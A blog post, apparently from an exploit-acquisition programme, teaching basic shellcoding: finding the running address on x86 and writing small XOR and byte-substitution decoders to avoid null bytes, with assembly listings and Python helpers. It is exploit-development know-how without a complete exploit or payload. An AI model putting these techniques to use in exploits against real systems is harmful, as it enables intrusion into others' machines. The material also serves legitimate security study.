KISS shellcoding and exploitation

In this blog I will talk about anything and everything to do with vulnerability exploitation. This is part of the job I do for SecuriTeam’s SSD. For those who are not aware of the project, its aim is to compensate researchers for their research efforts; compensation of course being money, not just fame and glory :)
The work I do revolves around the exploits we receive and the shellcode inside them. In this blog post I will focus mostly on simple problems and aspects of writing exploits, and show how I have solved some of these problems in the past.

A common sight when looking for exploitation information is a complicated exploit or shellcode made of C and ugly assembly strings. Rather than writing up the 287637639th exploit, I will discuss different problems and goals faced when exploiting and shellcoding. My main focus will be explaining problems often encountered and offering simple, general approaches to solving them, with an emphasis on working, easy-to-implement solutions.

Rather than building a full (“weaponized”) exploit, I will go through the process of building a PoC. I may also talk about some simple and effective ways of building an exploit-compilation framework.

I like to start from the beginning, but even seasoned exploiters can already prepare themselves for some surprises and twists.

SHELLCODING PRIMER

One of the main problems encountered when exploiting a vulnerability, even if it is a simple stack overflow, is shellcode restrictions. Often the nature of the specific vulnerability will prevent us from using specific bytes, or force us to use certain combinations. Obviously, every constraint is different. Let’s start with the classic “zero-tolerance” constraint: our shellcode cannot contain null bytes, usually because it is delivered as part of a null-terminated string, so the first null byte would cut it short.

This type of constraint is indeed a classic textbook example, but it is also a common problem in real-world shellcode writing and exploitation. It is very common in vulnerabilities surrounding textual streams such as HTML, XML, telnet and others. (Often these streams can be encoded in Unicode, but this creates different problems.)

In the October Patch Tuesday alone we can find many vulnerabilities, especially those in MS09-054, that may require dealing with these limitations (when not serving a Unicode-encoded webpage). This is the case with CVE-2009-2529 and with some implementations of an exploit for CVE-2009-2530. It is probably also the case for CVE-2009-2531 and many other vulnerabilities.

If you have never tackled this problem before, stop reading here, and think of  how you would solve this problem.

The answer is, of course, a decoder. There are many examples of byte-substitution decoders out there, written in hundreds of lines of C.
Let’s see what the basic concept behind these is. We want to write code that does not contain any null bytes, so we obviously have to either substitute the null bytes with something different or escape them. Does substitution really cut it?

A quick histogram of all the code in kernel32.dll (or any other simple DLL) shows that some byte values appear far less often than others in code and printable data.
We can simply histogram our shellcode (using Hex Workshop, for example) and choose a magic byte, one that does not appear in it at all, to stand in for the null bytes.
[picture-histogram]
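
If you do not have a hex editor at hand, the same histogram can be sketched in a few lines of Python. This is only a minimal illustration: the function names `unused_bytes` and `rarest_bytes` and the `sample` bytes are made up for this example and are not taken from any real tool or exploit.

```python
from collections import Counter


def unused_bytes(payload: bytes) -> list:
    """Return every byte value (1..255) that never occurs in payload."""
    counts = Counter(payload)
    return [value for value in range(1, 256) if counts[value] == 0]


def rarest_bytes(payload: bytes, n: int = 5) -> list:
    """Return the n least frequent byte values as (value, count) pairs."""
    counts = Counter(payload)
    pairs = [(value, counts[value]) for value in range(256)]
    # Sort by count first, then by value so the result is deterministic.
    return sorted(pairs, key=lambda pair: (pair[1], pair[0]))[:n]


# Hypothetical placeholder bytes, standing in for a real blob of code.
sample = bytes([0x31, 0xC0, 0x50, 0x00, 0x00, 0x90, 0x90])

candidates = unused_bytes(sample)
print("candidate magic bytes:", [hex(value) for value in candidates[:8]])
```

Any value returned by `unused_bytes` is a safe candidate for the magic byte. When the list comes back empty, plain substitution no longer cuts it and some form of escaping is needed.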

Let’s look at the stages we need to go through in order to decode our shellcode. I won’t go into OS-specific issues in depth, but they are mentioned:
- find the position we are running from (aka getPC)
- deal with memory-permission issues
- rewrite our code

Locating home

In order to decode the shellcode we must first be able to find it, which means finding the position we are running from. Unfortunately x86 does not allow direct access to eip (IA-64 does, somewhat :) ), so we must find it indirectly. There are several methods of accomplishing this, each with benefits and drawbacks. I am assuming throughout that no null bytes are allowed.

We can use the CALL opcode, which pushes the address of the instruction following it (the return address) onto the stack.

A naive method using call:
_SIMPLE_CALL_GETPC_
jmp @START_GA
@GET_ADDR:
pop edi                            // get the return address that call pushed onto the stack
add edi,(@START_CODE-@RET_ADDR)    // here we calculate the address we need
jmp @DECODE
@START_GA:
call @GET_ADDR         // pushes the address of @RET_ADDR. the call goes backwards, so the upper displacement bytes are FF rather than 00
@RET_ADDR:             // this address will be pushed
@END_GA:
@DECODE:
[decoder goes here]
@START_CODE:

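Or we can use a slightly more sophisticated method:

_CALL_IN_TO_OPCODE_
@GET_ADDR:
call @AFTER_CALL-1     // displacement of -1, encodes as “E8FFFFFFFF”
@AFTER_CALL:           // this is the address that gets pushed
db 0xC8                // with the last FF of the call this decodes as “FFC8”, dec eax
inc eax                // undo the dec eax
pop edi
add edi,(@START_CODE-@AFTER_CALL)

@END_GA:
@DECODE:
[decoder goes here]
@START_CODE: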

What I did here is call into the call opcode itself. The call targets its own last byte (end-of-opcode minus 1), so the encoded displacement is -1, which gives 0xFFFFFFFF rather than anything containing null bytes; this is because part of the opcode holds the jump distance and direction. After the call, a ‘dec eax’ (“FFC8”) opcode is executed, built from the last FF of the call and the C8 byte that follows it. I could easily have executed a slightly different opcode, but this one is fairly harmless, and after adding an ‘inc eax’ the pair amounts to a fancy NOP.
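
To see why the direction of the call matters, here is a small Python sketch that builds the bytes of a near `call rel32` (opcode E8 followed by a signed 32-bit little-endian displacement, measured from the end of the instruction). The helper name `encode_call_rel32` is made up for this illustration.

```python
import struct


def encode_call_rel32(displacement: int) -> bytes:
    """Encode x86 'call rel32': E8 plus a little-endian signed 32-bit displacement."""
    return b"\xE8" + struct.pack("<i", displacement)


forward = encode_call_rel32(0x10)     # E8 10 00 00 00: small forward call, full of nulls
backward = encode_call_rel32(-0x10)   # E8 F0 FF FF FF: small backward call, no nulls
into_self = encode_call_rel32(-1)     # E8 FF FF FF FF: call into the call's own last byte

for name, code in (("forward", forward), ("backward", backward), ("into_self", into_self)):
    print(name, code.hex(" "), "contains null:", 0 in code)
```

A short forward call always drags null bytes along, which is why the naive version jumps forward first and then calls backward. Note that a backward displacement is not automatically safe either: a value such as -0x100 encodes as 00 FF FF FF.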

Another option would be to just use an existing function that can be called (e.g. on Windows, through the syscall gateway):
_CALL_EXISTING_FUNCTION_
xor eax,eax
push eax
add eax, 0x3E          // this can be changed for anything which will not cause damage on the specific OS. in this case ntclosefile(NULL)
mov edx, 0x7FFE0301    // windows “syscall gateway” pointer, plus 1 to avoid the null byte
dec edx                // edx = 0x7FFE0300
mov edx, [edx]
call edx               // this will perform an os-specific syscall
@RET_ADDR:
mov edi, [esp-4]       // the return address is still just below esp, as long as nothing has overwritten it
add edi,(@START_CODE-@RET_ADDR)
@END_GA:
@DECODE:
[decoder]
@START_CODE:

That’s about it for using call. Another nice trick is using some FPU opcodes:

fld1                   // any FPU opcode will do; its address is what gets recorded
fstenv [esp-0xC]       // store the FPU environment so that the address of the last executed FPU opcode lands at [esp]. this can probably be replaced by FSAVE/FXSAVE/some other?
pop edi
add edi….

A completely different approach would be to copy our code to a known place. Let’s choose 7FFE0410 on Windows (assuming no NX bit is present and that we know the space is not in use, and disregarding the fact that in reality we cannot write to this address, as it is read-only from user mode).
_COPY_THE_CODE_
mov eax, 0x7FFE0410                  // 7FFE0300+0x110
[eax = shellcode_position]
mov dword ptr [eax], 0x90909090      // NOPNOPNOPNOP, the perfect shellcode
jmp/call eax

When copying a larger shellcode this will not be very compact, and in order to use string operations we would have to getPC anyway. A variant of this method is the famous “SEH method”, which essentially does the same, except that it uses an exception to eventually jump to where the code was copied.

Decoding
Now that we have found our own code base, we can restore our escaped or replaced bytes. Here are two simple, hacky decoders which are easy to implement and good enough in many cases. They only work if there is a byte value which does not appear anywhere in the code/data, as I discussed above.

XOR_IT_ALL:

jmp @START_GA
@GET_ADDR:
pop edi                               // edi = address of @RET_ADDR
add edi,(@END_DECODER-@RET_ADDR)      // edi = start of the encoded code
jmp @DECODE
@START_GA:
call @GET_ADDR

@RET_ADDR:
@DECODE:

xor ecx,ecx
add ecx,@END_CODE-@END_DECODER  ;smaller than 0x7f. can be done multiple times
mov al, 0xA7                          // the magic byte

@REPLACE_NEXT:
mov bl, byte ptr [edi]
xor bl,al
mov byte ptr [edi],bl                 // write the decoded byte back in place
inc edi                               // only then move on to the next byte
loop @REPLACE_NEXT

@END_DECODER:
NOP
NOP
NOP
NOP
NOP
@END_CODE:
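
The encoding side of this decoder is not shown, so here is a minimal Python sketch of it. It assumes the same single-byte XOR scheme as the listing; the names `pick_xor_key` and `xor_bytes` and the `payload` bytes are placeholders invented for this example.

```python
def pick_xor_key(payload: bytes) -> int:
    """Return the first non-zero byte value that never occurs in payload."""
    for key in range(1, 256):
        if key not in payload:
            return key
    raise ValueError("every byte value 1..255 occurs in the payload")


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with key. Applying it twice restores the input."""
    return bytes(value ^ key for value in data)


# Hypothetical placeholder bytes containing nulls, not a real payload.
payload = bytes([0x90, 0x00, 0x31, 0xC0, 0x00])

key = pick_xor_key(payload)
encoded = xor_bytes(payload, key)

print("key:", hex(key))
print("encoded:", encoded.hex(" "))
print("null-free:", 0 not in encoded)
print("round trip ok:", xor_bytes(encoded, key) == payload)
```

The same function encodes and decodes, which is what makes the assembly loop so small. The key the script picks has to be the one hard-coded in the `mov al` of the decoder.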

Here we XORed the whole code with the magic byte. A byte XORed with the magic byte gives 0x00 only if it equals the magic byte, so if the magic byte did not exist in the original code, then 0x00 will not exist in the encoded code. A different method:

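SEARCH_AND_DESTROY:
jmp @START_GA
@GET_ADDR:
pop edi                               // edi = address of @RET_ADDR
add edi,(@END_DECODER-@RET_ADDR)      // edi = start of the encoded code
jmp @DECODE
@START_GA:
call @GET_ADDR

@RET_ADDR:
@DECODE:

xor ecx,ecx
add ecx,@END_CODE-@END_DECODER  ;smaller than 0x7f. can be done multiple times
cld
mov al, 0xA7                          // the magic byte to search for
xor dl,dl                             // dl = 0x00, the byte to put back

@REPLACE_NEXT:

repnz scasb                           // scan forward until [edi] == al or ecx runs out
jnz @END_DECODER                      // ran out without a match: nothing left to replace
mov byte ptr [edi-1],dl               // scasb already stepped past the match, so patch [edi-1]
test ecx,ecx
jnz @REPLACE_NEXT
@END_DECODER:
NOP
NOP
NOP
NOP
NOP
@END_CODE: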
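
The matching encoder for this search-and-replace decoder can be sketched in Python as well. Again, this is only an illustration under the assumption that the magic byte (0xA7 in the listing) does not occur in the original bytes; `substitute_nulls`, `restore_nulls` and the `payload` bytes are names and data made up for the example.

```python
def substitute_nulls(payload: bytes, magic: int) -> bytes:
    """Replace every 0x00 with magic. Refuses a magic byte that is unusable."""
    if magic == 0 or magic in payload:
        raise ValueError("magic byte must be non-zero and absent from the payload")
    return payload.replace(b"\x00", bytes([magic]))


def restore_nulls(encoded: bytes, magic: int) -> bytes:
    """Mirror of the assembly loop: turn every magic byte back into 0x00."""
    return encoded.replace(bytes([magic]), b"\x00")


MAGIC = 0xA7

# Hypothetical placeholder bytes containing nulls, not a real payload.
payload = bytes([0x6A, 0x00, 0x68, 0x00, 0x10, 0x00, 0x00])

encoded = substitute_nulls(payload, MAGIC)
print("encoded:", encoded.hex(" "))
print("null-free:", 0 not in encoded)
print("round trip ok:", restore_nulls(encoded, MAGIC) == payload)
```

Compared with XORing everything, substitution leaves every non-null byte untouched, so the encoded blob is still readable in a disassembler, at the price of a slightly longer decoder.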

In order to build a more robust decoder, one which supports escaping or alphanumeric encoding, it is possible to write one from scratch in assembly. SkyLined has written a very elegant decoder, available at http://skypher.com. Another option is to have a small, hacky, custom-adapted decoder like the one we just wrote decode a bigger decoder written in C.

In the upcoming post I will show how I tried (and succeeded) in building shellcode which has gone through a process of ASCII-to-Unicode conversion. This shellcode has to be written so that every second byte, and only every second byte, is a null byte. Try this at home, and let me know if you come up with anything good.
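
If you want to check your attempts, the constraint can be expressed as a short Python test. This sketch assumes the conversion simply widens each ASCII byte to UTF-16LE, which is the simplest case; real conversions depend on the code page in use. The names `widen` and `fits_unicode_constraint` are invented for this example.

```python
def widen(ascii_bytes: bytes) -> bytes:
    """Simulate a plain ASCII-to-Unicode conversion (assumed to be UTF-16LE)."""
    return ascii_bytes.decode("ascii").encode("utf-16-le")


def fits_unicode_constraint(code: bytes) -> bool:
    """True if every second byte, and only every second byte, is a null byte."""
    if len(code) % 2 != 0:
        return False
    return all((value == 0) == (index % 2 == 1) for index, value in enumerate(code))


converted = widen(b"AB")
print(converted.hex(" "))
print(fits_unicode_constraint(converted))
```

Anything that is supposed to survive the conversion and still run has to pass `fits_unicode_constraint` in its converted form.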

Leaving you with one more point for thought: shellcode that will run on both x86 and x64...
